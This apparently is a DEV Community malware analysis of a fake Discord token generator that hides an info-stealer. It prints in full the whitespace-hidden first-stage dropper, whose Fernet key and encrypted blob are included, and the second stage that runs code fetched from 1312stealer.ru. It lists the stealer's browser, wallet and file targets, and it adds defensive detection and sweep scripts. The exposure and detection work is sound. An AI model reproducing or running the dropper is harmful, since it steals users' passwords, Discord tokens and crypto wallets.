DEV Community

Spring-0

Exposing the Deception: Discord Account Generator with Hidden Malware

The Discord ecosystem has become a haven for malicious actors, whether by abusing Discord's CDN to spread malicious files behind a trusted-looking link, using Discord servers as C2 infrastructure, or other tricks.

More specifically, in this post I will be investigating one of the many malicious "Discord token generators" on the market. Let's get started.

The software is advertised on GitHub as an open-source project.

If you head to the project description, you will see something quite odd: a non-functional version of the project is open-sourced, and a paid version is advertised in that very same repository.

Repository

The shop is powered by sell.app so the website itself does not seem malicious.

Now let's investigate the paid version download.

The download consists of a "genSetup.zip" file containing the following:
FileContent

  • config.toml: Empty configuration file. Maybe it gets generated at runtime? (Hint: it doesn't.)
  • key.txt: Seems to be where the user is meant to enter their license key. I am presuming one is given after making the purchase.
  • requirements.txt: Lists legitimate libraries that a project of this type would need.
  • start.bat: Simply runs the Python file; nothing special there.

Opening main.py, we see the following (note the imports):
CodeScreenshot

After reviewing the rest of the code, it appears identical to the version the actor uploaded to GitHub. There does not seem to be any malicious code, or at least none that is malicious to the user. Discord would say otherwise.

So where is this malicious code? We were given a non-obfuscated Python file.

You may have already noticed it in the initial code screenshot: the horizontal scrollbar shows that there is much more content off to the right. It turns out the malicious code is on the very first line, pushed out of view by a long run of whitespace after `import requests`.

Here is that first line with the whitespace padding removed (it is a single physical line; the rest of the file is untouched):

```python
import requests   ;import os;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk=').decrypt(b'gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU=')) # type: ignore
```

A sneaky one liner. Now we can begin examining the payload.

First it installs the following libraries at import time, via os.system(). None of them are listed in the provided "requirements.txt":

  1. cryptography
  2. fernet
  3. requests

The `# type: ignore` comment suppresses type-checker diagnostics for that line, so an editor will not draw attention to it.

We can clearly see that an encrypted blob is decrypted and then executed through the exec() function call.

Lucky for us, the Fernet key is right there in the code. Fernet is symmetric, so the key that encrypted the payload is the key that decrypts it.

If the key is shipped in the source code, what is the point of encrypting the payload? It is not confidentiality. The encryption is an evasion technique aimed at signature-based malware scanners: they see a random-looking blob instead of the URLs and calls inside the payload. Anyone with the key (which is everyone who has the file) can recover the plaintext in one call.
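What signature scanners miss here is structural rather than byte-level: code resuming after a whitespace gap, pip invoked through os.system() at import time, exec() of a Fernet-decrypted blob with a hard-coded key, and `# type: ignore` on that exec line. A small static triage script can catch exactly those shapes. The script below is an added example written for this write-up, not code from the author or from the generator; the thresholds (a 20-character gap, a 160-character line) and the sample file are my own constructions, with the first sample line mirroring the one-liner above (token shortened) and the second being the stage-two line the blob decrypts to.

```python
import re
from dataclasses import dataclass

# Thresholds are assumptions, tuned to the sample in this post.
MAX_LINE_LEN = 160
PADDING_GAP = re.compile(r"\S[ \t]{20,}\S")      # code resumes after a long blank run
RUNTIME_PIP = re.compile(r"os\.system\s*\(\s*['\"]pip install")
EXEC_DECRYPT = re.compile(r"\bexec\s*\(.*\.decrypt\s*\(")
EXEC_FETCH = re.compile(r"\bexec\s*\(\s*requests\.get\s*\(")
FERNET_KEY = re.compile(r"Fernet\s*\(\s*b?['\"]([A-Za-z0-9_-]{43}=)['\"]\s*\)")


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str = ""


def triage_source(text: str) -> list[Finding]:
    """Flag lines of a Python file that use the hiding tricks seen in this sample."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if PADDING_GAP.search(line):
            findings.append(Finding(line_no, "padded_gap", "code hidden past a whitespace run"))
        if len(line) > MAX_LINE_LEN:
            findings.append(Finding(line_no, "long_line", f"{len(line)} chars"))
        if RUNTIME_PIP.search(line):
            findings.append(Finding(line_no, "runtime_pip", "pip invoked via os.system at import time"))
        if EXEC_DECRYPT.search(line):
            findings.append(Finding(line_no, "exec_decrypt", "exec() of decrypted data"))
        if EXEC_FETCH.search(line):
            findings.append(Finding(line_no, "exec_fetch", "exec() of an HTTP response body"))
        if "exec(" in line and "# type: ignore" in line:
            findings.append(Finding(line_no, "type_ignore", "type checker silenced on an exec() line"))
        m = FERNET_KEY.search(line)
        if m:
            findings.append(Finding(line_no, "fernet_key", m.group(1)))
    return findings


def rules_for(findings: list[Finding], line_no: int) -> set[str]:
    """Names of the rules that fired on one line."""
    return {f.rule for f in findings if f.line_no == line_no}


# Constructed sample: line 1 mirrors the post's first-stage line (token shortened),
# the remaining lines are harmless filler standing in for the generator code.
SAMPLE_MAIN_PY = "\n".join([
    "import requests" + " " * 40 + ";import os;os.system('pip install cryptography');"
    "os.system('pip install fernet');from fernet import Fernet;"
    "exec(Fernet(b'NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk=')"
    ".decrypt(b'gAAAAABm...')) # type: ignore",
    "import os",
    "",
    "def generate(count):",
    "    return [requests.get('https://example.invalid').text for _ in range(count)]",
])

# The second-stage line the first stage decrypts to, as shown in the post.
SAMPLE_STAGE2 = ("exec(requests.get('https://1312stealer.ru/paste?userid=1000000000')"
                 ".text.replace('<pre>','').replace('</pre>',''))")


if __name__ == "__main__":
    for f in triage_source(SAMPLE_MAIN_PY) + triage_source(SAMPLE_STAGE2):
        print(f"line {f.line_no}: {f.rule:12} {f.detail}")
```

Run it over every .py file in a download before you run the download itself; any single line that trips three or more of these rules deserves a look, and the `fernet_key` finding hands you the key for the next step.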

Using the following code I wrote, I was able to see the decrypted code:

```python
# The dropper imports a third-party "fernet" module; cryptography's own Fernet handles this token format.
from cryptography.fernet import Fernet

key = "NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk="   # symmetric key lifted from the one-liner
message = "gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPUvA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1ZkvtJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd0nwK2sU="  # the blob passed to .decrypt()

fernet = Fernet(key)
decrypted_message = fernet.decrypt(message)  # raises InvalidToken if the HMAC does not verify
print(decrypted_message.decode())
```

And this is the output:

```python
exec(requests.get('https://1312stealer.ru/paste?userid=1000000000').text.replace('<pre>','').replace('</pre>',''))
```

Yet another exec() call, this time on whatever a website at the domain 1312stealer.ru serves back. Not very subtle now.
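Fernet.decrypt() gives you the plaintext, but the token carries more than that. A Fernet token is version byte (0x80), a 64-bit big-endian creation timestamp, a 16-byte IV, AES-128-CBC ciphertext and a 32-byte HMAC-SHA256 over everything before it, keyed with the first half of the decoded key. The timestamp is the attacker's clock at the moment the stage was encrypted, which dates the build. The parser below is an added example for this post (not the author's code): it reads those fields with the standard library only, verifies the HMAC with the key from the one-liner, and falls back to cryptography's Fernet for the actual decryption if that package happens to be installed. The key and token are copied from the one-liner above.

```python
import base64
import hashlib
import hmac
import struct
from datetime import datetime, timezone

# Key and token copied from the first-stage one-liner in this post.
KEY = b"NxcOFeqTLbTifLJ5_7mxQXhutuWykVQw0M_plAqkbAk="
TOKEN = (
    b"gAAAAABmZSyv6BjNz3eMFn6xU8umUhs2m33n49caMlU4XWRcQBntQQ2jwtDuUA9pKNfT9wnyBx6TJoPU"
    b"vA2vDVJkWV5KcAsR1Qtjmgsr-t1oenrd8TxXsDO6QGg2LcQlMonT1qgE8LZ4KDDIKlDupRJLqakR1Zkv"
    b"tJctUKSMBFIP0Y2EmXjCFCgIzC-n4kJDmsiqJUiUMIcrEgP30SU4GU2lfwOhDyO95cv7MXdbZAyLbqfd"
    b"0nwK2sU="
)


def parse_fernet_token(token: bytes, key: bytes) -> dict:
    """Split a Fernet token into its fields and check its HMAC with the given key.

    Layout (cryptography.io Fernet spec): version 0x80 | 64-bit big-endian
    timestamp | 16-byte IV | AES-128-CBC ciphertext | 32-byte HMAC-SHA256.
    The HMAC key is the first 16 bytes of the decoded key; AES uses the last 16.
    """
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < 1 + 8 + 16 + 32 or raw[0] != 0x80:
        raise ValueError("not a Fernet token")
    timestamp = struct.unpack(">Q", raw[1:9])[0]
    body, tag = raw[:-32], raw[-32:]
    signing_key = base64.urlsafe_b64decode(key)[:16]
    expected = hmac.new(signing_key, body, hashlib.sha256).digest()
    return {
        "version": raw[0],
        "timestamp": timestamp,
        "created_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "iv": raw[9:25].hex(),
        "ciphertext_len": len(raw) - 57,        # must be a multiple of the AES block size
        "hmac_valid": hmac.compare_digest(expected, tag),
    }


def decrypt_stage(token: bytes, key: bytes):
    """Plaintext of the next stage via the real Fernet implementation, or None if
    cryptography is not installed or the token does not verify."""
    try:
        from cryptography.fernet import Fernet, InvalidToken
    except ImportError:
        return None
    try:
        return Fernet(key).decrypt(token).decode("utf-8", "replace")
    except (InvalidToken, TypeError, ValueError):
        return None


if __name__ == "__main__":
    for name, value in parse_fernet_token(TOKEN, KEY).items():
        print(f"{name:15} {value}")
    print("next stage:", decrypt_stage(TOKEN, KEY))
```

The same function works on the longer token in the gruppe.py stage, so you can date each layer of the dropper independently; a token whose HMAC fails with the embedded key means the key and blob came from different builds, which is worth knowing before you trust the plaintext.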

Anyway, let's see what is being executed.
PasteFromSite

Installing fernet again? And this time with a different system execution command? Looks to me like someone has been using Ctrl+C and Ctrl+V a little too much 😂

Let's break this down.
The code creates a file named "gruppe.py" in the APPDATA directory, writes code into it, and finally executes it.

Judging by the length of the encrypted payload (trimmed in the screenshot above), this looks like the final payload.

Let's decrypt it using the same method as before and see exactly what this malware does.

There is a targeted list of browsers, browser extensions, wallets, directories to search, file keywords, file extensions, and Discord token paths.

Here are the specific targets:

Browsers

  • Google Chrome
  • Microsoft Edge
  • Opera
  • Opera GX
  • Brave
  • Yandex
  • Firefox

Browser Extensions

  • Authenticator
  • Binance
  • Bitapp
  • BoltX
  • Coin98
  • Coinbase
  • Core
  • Crocobit
  • Equal
  • Ever
  • ExodusWeb3
  • Fewcha
  • Finnie
  • Guarda
  • Guild
  • HarmonyOutdated
  • Iconex
  • Jaxx
  • Kaikas
  • KardiaChain
  • Keplr
  • Liquality
  • MEWCX
  • MaiarDEFI
  • Martian
  • Math
  • Metamask
  • Metamask2
  • Mobox
  • Nami
  • Nifty
  • Oxygen
  • PaliWallet
  • Petra
  • Phantom
  • Pontem
  • Ronin
  • Safepal
  • Saturn
  • Slope
  • Solfare
  • Sollet
  • Starcoin
  • Swash
  • TempleTezos
  • TerraStation
  • Tokenpocket
  • Ton
  • Tron
  • Trust Wallet
  • Wombat
  • XDEFI
  • XMR.PT
  • XinPay
  • Yoroi
  • iWallet

Wallets

  • Atomic
  • Exodus
  • Electrum
  • Electrum-LTC
  • Zcash
  • Armory
  • Bytecoin
  • Jaxx
  • Etherium
  • Guarda
  • Coinomi

Target Paths

  • Desktop
  • Documents
  • Downloads
  • OneDrive\Documents
  • OneDrive\Desktop

File Keywords

  • passw
  • mdp
  • mot_de_passe
  • login
  • secret
  • account
  • acount
  • paypal
  • banque
  • metamask
  • wallet
  • crypto
  • exodus
  • discord
  • 2fa
  • code
  • memo
  • compte
  • token
  • backup
  • seecret

Now let's look further into how each of these is targeted.

First, passwords and cookies are retrieved from the browsers and saved to "APPDATA\gruppe_storage". This storage folder holds everything extracted from the victim's machine until it is uploaded.

The passwords retrieved are the ones you chose to save in the browser (the popup that asks whether to save your password whenever you register on a site).

BrowserCode

Browser extension folders are simply zipped up whole; no specific data is extracted from them.
ExtensionCode

Using a regular expression, Discord tokens are retrieved from the local Discord files. Along with the tokens, the account data tied to them (phone number, email, display name, user ID) is also retrieved.

In case you are not aware, having an individual's Discord token lets you authenticate as them, bypassing two-factor authentication entirely.

Files located in the target paths listed above are filtered based on the target keywords and file extensions.

PathFilteringCode

Similar to the browser extensions, the wallet paths are also zipped up whole.

WalletPathCode

Specifically for the Atomic and Exodus wallets, malicious code retrieved from https://1312stealer.ru/wallet and https://1312stealer.ru/wallet/atomic is written into the wallet directories; it injects into the wallet applications to capture mnemonics and passwords.

WalletInjectionCode

Ten times. It calls the inject function ten times. I guess they really want that in there 😂

Now all that data is sitting in APPDATA\gruppe_storage. How do they get their hands on it?

SendToServerCall
We can see each file in gruppe_storage being passed as a parameter to the upload_to_server() function.

Here we can see the final destination of the data: 1312stealer.ru/delivery
SendToServerCode

Again, called ten times. Maybe 10 is their lucky number 🤷
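Everything above gives a short list of host artefacts to look for if someone on your team ran this "generator": gruppe.py under APPDATA, the gruppe_storage loot folder beside it, and wallet directories that now contain code referencing 1312stealer.ru. The sweep below is an added example for this post, not the author's code or anything from the stealer. It takes the APPDATA path and the wallet directories to scan as arguments (I am not assuming where Atomic and Exodus live on a given machine), and the demo tree it builds when run without arguments is constructed, including the stand-in file names.

```python
import sys
import tempfile
from pathlib import Path

# Host artefacts named in this post's analysis.
DROPPED_SCRIPT = "gruppe.py"           # dropped into %APPDATA% and executed
STAGING_DIR = "gruppe_storage"         # loot folder under %APPDATA%
C2_DOMAIN = b"1312stealer.ru"          # served the wallet injection code
MAX_SCAN_BYTES = 4 * 1024 * 1024       # assumption: skip files over 4 MiB when grepping


def sweep_host(appdata: Path, wallet_dirs: list[Path]) -> list[tuple[str, str]]:
    """Return (indicator, path) pairs for every artefact found on disk."""
    hits: list[tuple[str, str]] = []
    script = appdata / DROPPED_SCRIPT
    if script.is_file():
        hits.append(("dropped_script", str(script)))
    staging = appdata / STAGING_DIR
    if staging.is_dir():
        hits.append(("staging_dir", str(staging)))
        hits.extend(("staged_loot", str(f)) for f in sorted(staging.rglob("*")) if f.is_file())
    for wdir in wallet_dirs:
        if not wdir.is_dir():
            continue
        for f in sorted(wdir.rglob("*")):
            if not f.is_file() or f.stat().st_size > MAX_SCAN_BYTES:
                continue
            try:
                data = f.read_bytes()
            except OSError:
                continue
            if C2_DOMAIN in data:
                hits.append(("wallet_injection", str(f)))
    return hits


def demo_sweep(infected: bool = True) -> list[tuple[str, str]]:
    """Build a throwaway directory tree (constructed, not a real host) and sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        appdata = root / "AppData" / "Roaming"
        wallet = root / "Exodus"              # stand-in for a wallet install directory
        appdata.mkdir(parents=True)
        wallet.mkdir(parents=True)
        (wallet / "settings.json").write_text('{"theme": "dark"}\n')   # benign file
        if infected:
            (appdata / DROPPED_SCRIPT).write_text("exec('...')  # stand-in for the dropper\n")
            loot = appdata / STAGING_DIR
            loot.mkdir()
            (loot / "chrome_passwords.txt").write_text("user:pass\n")
            (wallet / "hook.js").write_text("fetch('https://1312stealer.ru/wallet')\n")
        return sweep_host(appdata, [wallet])


if __name__ == "__main__":
    if len(sys.argv) > 2:
        # usage: python sweep.py <APPDATA dir> <wallet dir> [<wallet dir> ...]
        hits = sweep_host(Path(sys.argv[1]), [Path(p) for p in sys.argv[2:]])
    else:
        hits = demo_sweep()
    for kind, path in hits:
        print(f"{kind:17} {path}")
```

A clean sweep is not proof of absence: the loot is uploaded and can be wiped afterwards, and a later build can rename gruppe.py and the storage folder. Treat the domain hit inside a wallet directory as the strongest signal, and rotate the Discord token, browser passwords and wallet seeds regardless.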

Thanks for reading :)

🌱

Top comments (2)

Keef

Exceptional work, Spring.

Adam

Good insight. Nice job.